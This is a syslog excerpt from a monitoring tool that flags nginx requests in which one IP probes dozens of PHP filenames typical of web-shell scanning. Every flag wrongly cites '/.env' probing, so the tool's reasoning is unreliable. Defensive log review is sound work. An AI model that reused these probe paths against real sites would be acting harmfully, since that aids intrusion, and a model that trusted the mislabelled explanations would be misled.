Mar 20 09:11:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:36.962482 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:36.962219819Z 20.220.232.240 - - [20/Mar/2026:09:11:36 +0000] "media.admin.kovicloud.com" "GET /sa.php7 HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.030296 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.030021066Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /sa.php7 HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.099518 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.099216557Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /ms-edit.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.167281 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.166986911Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /ms-edit.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.234521 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.234266703Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp9.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.305922 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.305672621Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp9.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.373203 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.372906471Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wen.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.441573 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.441323742Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wen.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.508808 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.508369778Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp5.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.577542 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.577293596Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /wp5.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.645039 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.644720516Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /varb.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.712548 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.712286079Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /varb.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.779687 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.779427062Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /tt.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.850826 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.850569692Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /tt.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.918138 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:37.917878294Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /gettest.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:37.985945 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:37.985691948Z 20.220.232.240 - - [20/Mar/2026:09:11:37 +0000] "media.admin.kovicloud.com" "GET /gettest.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.053269 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.053006499Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /vx.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.122040 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.121770126Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /vx.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.189238 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.188973173Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /abrand.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.257293 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.257034199Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /abrand.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.353809 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.353520727Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /8573.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.421571 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.421325370Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /8573.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.490872 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.490567716Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /bolt.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.558497 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.558239302Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /bolt.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.625618 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.625362718Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /tfm.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.693767 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.693530573Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /tfm.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.761206 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.760928953Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /lm15.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.831458 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.831153959Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /lm15.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.898481 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:38.898235213Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:38.966207 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:38.965937013Z 20.220.232.240 - - [20/Mar/2026:09:11:38 +0000] "media.admin.kovicloud.com" "GET /wp-admin/css/bolt.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.033404 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.033108109Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET //nw.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.103012 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.102757026Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET //nw.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.170810 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.170557017Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /bnm.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.238627 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.238393159Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /bnm.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.307548 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.307268135Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /nw.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.408339 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.408073628Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /nw.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.475534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.475281869Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /s.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.543653 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.543395888Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /s.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.610835 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.610557381Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /hplfuns.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.678610 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.678324741Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /hplfuns.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.745859 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.745564630Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /jp.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.814256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.813963272Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /jp.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.881367 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:39.881090949Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /xsas.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:39.949302 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:39.949017179Z 20.220.232.240 - - [20/Mar/2026:09:11:39 +0000] "media.admin.kovicloud.com" "GET /xsas.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.017343 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.016956333Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /5b9ac.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.085999 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.085734935Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /5b9ac.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.153464 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.153206369Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /okxh.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.221584 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.221336948Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /okxh.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.289066 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.288783355Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /rzki.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.356962 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.356689460Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /rzki.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.425224 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.424952223Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /edit.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.493675 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.493434325Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /edit.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.561016 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.560564426Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /t.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.629191 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.628901766Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /t.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.696239 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.695928794Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /file.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.764112 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.763869822Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /file.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.835289 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.835041819Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /66.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.903055 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:40.902816504Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /66.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:40.970114 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:40.969882029Z 20.220.232.240 - - [20/Mar/2026:09:11:40 +0000] "media.admin.kovicloud.com" "GET /amax.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.037989 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:41.037720122Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /amax.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:41 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:41.113427 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:41.113129994Z 20.220.232.240 - - [20/Mar/2026:09:11:41 +0000] "media.admin.kovicloud.com" "GET /ioxi-o.php HTTP/1.1" 302 138 "-" "-" "-"
